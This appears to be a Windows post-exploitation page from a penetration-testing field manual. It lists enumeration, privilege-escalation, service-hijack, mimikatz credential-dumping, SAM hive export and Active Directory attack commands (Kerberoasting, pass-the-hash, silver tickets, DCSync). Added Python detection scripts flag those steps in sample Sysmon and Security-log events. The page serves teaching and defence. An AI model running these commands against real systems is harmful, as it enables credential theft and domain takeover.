> For the complete documentation index, see [llms.txt](https://rouxtronics.gitbook.io/stemsecure/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rouxtronics.gitbook.io/stemsecure/field-manual/04-post-exploitation-windows.md).

# 04 - Post-Exploitation: Windows

## Situational Awareness

| Command                                                        | Purpose                  |
| -------------------------------------------------------------- | ------------------------ |
| `whoami /all`                                                  | User, groups, privileges |
| `net user` / `net localgroup administrators`                   | Local accounts           |
| `systeminfo`                                                   | OS, hotfixes, domain     |
| `ipconfig /all; route print`                                   | Network config           |
| `netstat -ano`                                                 | Active connections       |
| `tasklist /SVC`                                                | Running processes        |
| `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` | Autorun entries          |
| `wmic product get name,version`                                | Installed software       |

## Privilege Escalation

**Automated enum**: `winpeas.exe`, `PowerUp.ps1` (`Invoke-AllChecks`), `SharpUp.exe audit`

**Token impersonation**

List the privileges held by the current token and look for `SeImpersonatePrivilege` (or the other privileges in the table below):

```
whoami /priv
```

| Privilege                | Tool                                              |
| ------------------------ | ------------------------------------------------- |
| SeImpersonatePrivilege   | `PrintSpoofer.exe -i -c cmd` or `JuicyPotato.exe` |
| SeDebugPrivilege         | Migrate to a SYSTEM process (Meterpreter)         |
| SeTakeOwnershipPrivilege | `takeown /f C:\Windows\System32\...`              |

**Service exploits**

```
sc qc <service>
accesschk64.exe -wuvc <service>
sc config <service> binpath= "C:\temp\shell.exe"
sc start <service>
```

**Credential harvesting**

```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
mimikatz.exe "lsadump::sam" "lsadump::secrets" exit
reg save HKLM\sam sam.hive && reg save HKLM\system system.hive
secretsdump.py -sam sam.hive -system system.hive LOCAL
```
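The service-binary swap and the credential-harvesting commands above each leave a distinct trace in host telemetry: `sc config ... binpath=` rewrites the service's `ImagePath` value, mimikatz `sekurlsa::` opens a read handle to `lsass.exe`, and `reg save HKLM\sam` shows up on a process command line. The script below is an added detection example, not code from the original page; it runs over constructed events that use Sysmon field names (EventID 13 RegistryEvent, 10 ProcessAccess, 1 ProcessCreate), and the LSASS allowlist and the "standard" service directories are assumptions to tune per environment.

```python
"""Detection rules for the service-binary swap and credential-harvesting steps above.
Added example, not code from the original page. Events are constructed dicts with
Sysmon field names (EventID 1 ProcessCreate, 10 ProcessAccess, 13 RegistryEvent);
the allowlist and path list are assumptions to tune per environment."""
import re
from typing import Iterable

PROCESS_VM_READ = 0x0010  # GrantedAccess bit needed to read LSASS memory

# Assumption: images that legitimately open LSASS on this estate (extend as needed).
LSASS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\lsass.exe",
    r"c:\windows\system32\svchost.exe",
}
# Assumption: directories a service ImagePath is expected to live under.
STANDARD_SERVICE_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

SAM_DUMP_RE = re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)
MIMIKATZ_RE = re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I)


def check_event(ev: dict) -> list[str]:
    """Return a list of alert strings for a single event (empty if benign)."""
    alerts = []
    eid = ev.get("EventID")
    if eid == 13:
        # `sc config <svc> binpath= ...` lands in ...\Services\<svc>\ImagePath
        target = ev.get("TargetObject", "").lower()
        image = ev.get("Details", "").lower().lstrip('"')
        if "\\services\\" in target and target.endswith("\\imagepath"):
            if not image.startswith(STANDARD_SERVICE_DIRS):
                alerts.append(f"service ImagePath set to non-standard location: {ev['Details']}")
    elif eid == 10:
        # Handle to lsass.exe with read access from an image outside the allowlist
        if ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            access = int(ev.get("GrantedAccess", "0x0"), 16)
            src = ev.get("SourceImage", "").lower()
            if access & PROCESS_VM_READ and src not in LSASS_ALLOWLIST:
                alerts.append(f"LSASS read access {ev['GrantedAccess']} from {ev['SourceImage']}")
    elif eid == 1:
        cmd = ev.get("CommandLine", "")
        if SAM_DUMP_RE.search(cmd):
            alerts.append(f"registry hive export: {cmd}")
        if MIMIKATZ_RE.search(cmd):
            alerts.append(f"mimikatz module on command line: {cmd}")
    return alerts


def scan(events: Iterable[dict]) -> list[tuple[str, str]]:
    """Run check_event over a stream and return (UtcTime, alert) pairs."""
    return [(ev.get("UtcTime", "?"), msg) for ev in events for msg in check_event(ev)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 13, "UtcTime": "2024-05-01 10:00:01", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VulnSvc\ImagePath",
     "Details": r"C:\temp\shell.exe"},
    {"EventID": 13, "UtcTime": "2024-05-01 10:00:02", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VendorSvc\ImagePath",
     "Details": r'"C:\Program Files\Vendor\svc.exe" -run'},
    {"EventID": 10, "UtcTime": "2024-05-01 10:01:00", "SourceImage": r"C:\Users\bob\Desktop\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "UtcTime": "2024-05-01 10:01:01", "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "UtcTime": "2024-05-01 10:02:00", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\sam sam.hive"},
    {"EventID": 1, "UtcTime": "2024-05-01 10:02:05", "Image": r"C:\Users\bob\Desktop\mimikatz.exe",
     "CommandLine": 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"EventID": 1, "UtcTime": "2024-05-01 10:02:10", "Image": r"C:\Windows\System32\whoami.exe",
     "CommandLine": "whoami /priv"},
]

if __name__ == "__main__":
    for ts, msg in scan(SAMPLE_EVENTS):
        print(ts, msg)
```

Against the sample stream this raises four alerts (the `C:\temp` ImagePath, the unlisted LSASS reader, the hive export, and the mimikatz command line) and stays quiet on the vendor service, `csrss.exe`, and `whoami /priv`. The Sysmon 13 rule only fires if the Sysmon configuration includes `RegistryEvent` rules for `\Services\*\ImagePath`, and the LSASS rule assumes `ProcessAccess` logging for `lsass.exe` is enabled; both are configuration choices, not defaults.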

## Active Directory

**Enumeration**

```
bloodhound-python -c All -u user -p pass -ns $TARGET -d domain.local
SharpHound.exe -c All --zipfilename enum.zip
ldapsearch -x -H ldap://$TARGET -b 'DC=domain,DC=local'
```

**Kerberos attacks**

| Attack          | Command                                                                          |
| --------------- | -------------------------------------------------------------------------------- |
| Kerberoasting   | `GetUserSPNs.py domain/user:pass -dc-ip $TARGET -request`                        |
| AS-REP roasting | `GetNPUsers.py domain/ -usersfile users.txt -dc-ip $TARGET`                      |
| Pass-the-hash   | `psexec.py -hashes :NTLM domain/user@$TARGET`                                    |
| Pass-the-ticket | `export KRB5CCNAME=ticket.ccache; psexec.py -k -no-pass user@host`               |
| Silver ticket   | `ticketer.py -nthash svc_hash -domain-sid S-1-5 -domain dom -spn cifs/host user` |
| DCSync          | `secretsdump.py domain/admin@$TARGET -just-dc`                                   |

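Three of the attacks in the table have well-known signatures in the domain controller's Security log: Kerberoasting is a burst of 4769 service-ticket requests with RC4 (`0x17`) encryption from one requester, AS-REP roasting is a 4768 TGT request with Pre-Authentication Type 0, and DCSync is a 4662 object access carrying the directory-replication extended rights from a principal that is not a domain controller. The script below is an added detection example, not code from the original page; it runs over constructed events that use the Security-log field names, and the Kerberoast threshold and time window are assumptions to tune for the domain.

```python
"""Detection heuristics for the Kerberos attacks in the table above.
Added example, not code from the original page. Events are constructed dicts using
Windows Security-log field names (4768 TGT request, 4769 service-ticket request,
4662 directory object access); thresholds and the window are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType requested by the roasting tools above
# Extended rights checked by the DC for replication; DCSync needs the first two.
REPL_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
)
# Assumptions: flag a requester once it pulls this many distinct RC4 service
# tickets for user accounts inside the window.
KERBEROAST_THRESHOLD = 3
KERBEROAST_WINDOW = timedelta(minutes=10)


def _ts(ev: dict) -> datetime:
    return datetime.strptime(ev["TimeCreated"], "%Y-%m-%dT%H:%M:%S")


def detect_kerberoasting(events: list[dict]) -> list[tuple[str, list[str]]]:
    """4769 bursts: one requester, several RC4 tickets for user service accounts.
    ServiceName in 4769 is the account name, so computer accounts end in '$'."""
    per_user: dict[str, list[tuple[datetime, str]]] = defaultdict(list)
    for ev in events:
        if ev["EventID"] != 4769 or ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = ev.get("ServiceName", "")
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_user[ev["TargetUserName"]].append((_ts(ev), svc))
    findings = []
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= KERBEROAST_WINDOW}
            if len(in_window) >= KERBEROAST_THRESHOLD:
                findings.append((user, sorted(in_window)))
                break
    return findings


def detect_asrep_roasting(events: list[dict]) -> list[str]:
    """4768 with Pre-Authentication Type 0 and RC4: the account has pre-auth disabled."""
    return [ev["TargetUserName"] for ev in events
            if ev["EventID"] == 4768
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType") == RC4_HMAC]


def detect_dcsync(events: list[dict]) -> list[str]:
    """4662 carrying replication rights from a principal that is not a DC computer account."""
    hits = []
    for ev in events:
        if ev["EventID"] != 4662:
            continue
        props = ev.get("Properties", "").lower()
        subject = ev.get("SubjectUserName", "")
        if any(g in props for g in REPL_GUIDS) and not subject.endswith("$"):
            hits.append(subject)
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:01", "TargetUserName": "jdoe",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:05", "TargetUserName": "jdoe",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:01:30", "TargetUserName": "jdoe",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:01:31", "TargetUserName": "jdoe",
     "ServiceName": "FILES01$", "TicketEncryptionType": "0x17"},   # computer account, ignored
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:02:00", "TargetUserName": "alice",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12"},    # AES, normal traffic
    {"EventID": 4768, "TimeCreated": "2024-05-01T10:03:00", "TargetUserName": "legacy_app",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TimeCreated": "2024-05-01T10:03:01", "TargetUserName": "alice",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"EventID": 4662, "TimeCreated": "2024-05-01T10:04:00", "SubjectUserName": "bob",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "TimeCreated": "2024-05-01T10:04:01", "SubjectUserName": "DC02$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    print("kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))
    print("AS-REP roasting:", detect_asrep_roasting(SAMPLE_EVENTS))
    print("DCSync:", detect_dcsync(SAMPLE_EVENTS))
```

On the sample stream `jdoe` is flagged for three RC4 tickets inside the window, `legacy_app` for a pre-auth-free TGT, and `bob` for replication rights, while the AES requests, the computer-account ticket and the DC's own replication are ignored. The 4662 rule depends on a SACL that audits "Replicating Directory Changes" on the domain head; without it the event is never written. Pass-the-hash and pass-the-ticket are not covered because their 4624 logons look like ordinary NTLM or Kerberos network logons and need baselining of source host and account pairs rather than a single-event rule.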